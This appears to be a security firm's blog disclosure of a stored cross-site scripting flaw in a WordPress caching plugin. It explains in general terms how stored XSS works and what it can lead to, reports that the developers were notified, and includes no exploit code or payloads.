Stored XSS Vulnerability in bodi0’s Easy Cache Plugin

Author
Updated: November 12th, 2024
2 mins read
Stored XSS vulnerability in bodiO

Product Name: bodi0’s Easy Cache
Vulnerability: Stored XSS
Vulnerable Version: Will be disclosed soon
CVE: Will be disclosed soon


On September 16, 2024, the team of pentesters at Astra Security found a stored Cross-Site Scripting or XSS in bodi0’s Easy Cache plugin. It is a plugin designed for WordPress that helps optimize the caching functionality, thus allowing enhanced page loading and reducing the server load.

A stored XSS vulnerability occurs when an application allows malicious user input, stored without proper sanitization and accessible to other application users.

How Does a Stored XSS Vulnerability Occur?

Stage 1: Injection

The first stage starts with the attacker injecting malicious payloads or scripts into the application using various methods, such as Injecting code into various input fields. This can also be achieved by uploading files injected with malicious payloads.

Stage 2: Storage:

The malicious code is stored within the application’s data storage, such as databases, file systems, cookies, or session data.

Stage 3: Retrieval and Execution:

Every time a user visits the page where the payload or infected file is stored or loaded, the code is executed within the user’s browser.

This can lead to vulnerabilities and threats like:

  • Attackers obtain sensitive information like session tokens or user credentials stored in the cookies.
  • Attackers can redirect valid users to malicious websites to try and steal sensitive information.
  • Attackers can execute arbitrary code on the user’s machine to find sensitive information or download malware/ransomware, etc.

Impact of Stored XSS Vulnerability

1. Session Compromise

After a successful injection, attackers can target any users who visit the affected page, causing issues like Cookie Theft or Session Hijacking, where user session information is stolen and a valid user is impersonated. This can also lead to account takeovers.

2. Malware and Ransomware Propagation

Unlike reflected XSS, stored XSS is persistent and can be used for malware and ransomware deployment. Once the payload is stored, malicious scripts affect any user accessing the vulnerable page.

3. Website Defacement

Malicious scripts can modify the content on web pages and presenting misleading information or making it hard for the users to identify malicious content and engage with it. Attackers can also inject advertisements on the web pages and disrupting user experience.

Current Status

Upon discovering the vulnerability in bodi0s easy-cache plugin, we promptly notified the platform’s developers, providing possible solutions, such as input sensitization, output encoding (HTML encoding) at the server side, and more, that they may implement to avoid any potential exploitation of user data.

Currently, they are working on implementing a patch while formulating a long-term solution for the vulnerability.

What can you do?

Update the affected version to the latest version once released by the bodi0s-easy-cache team.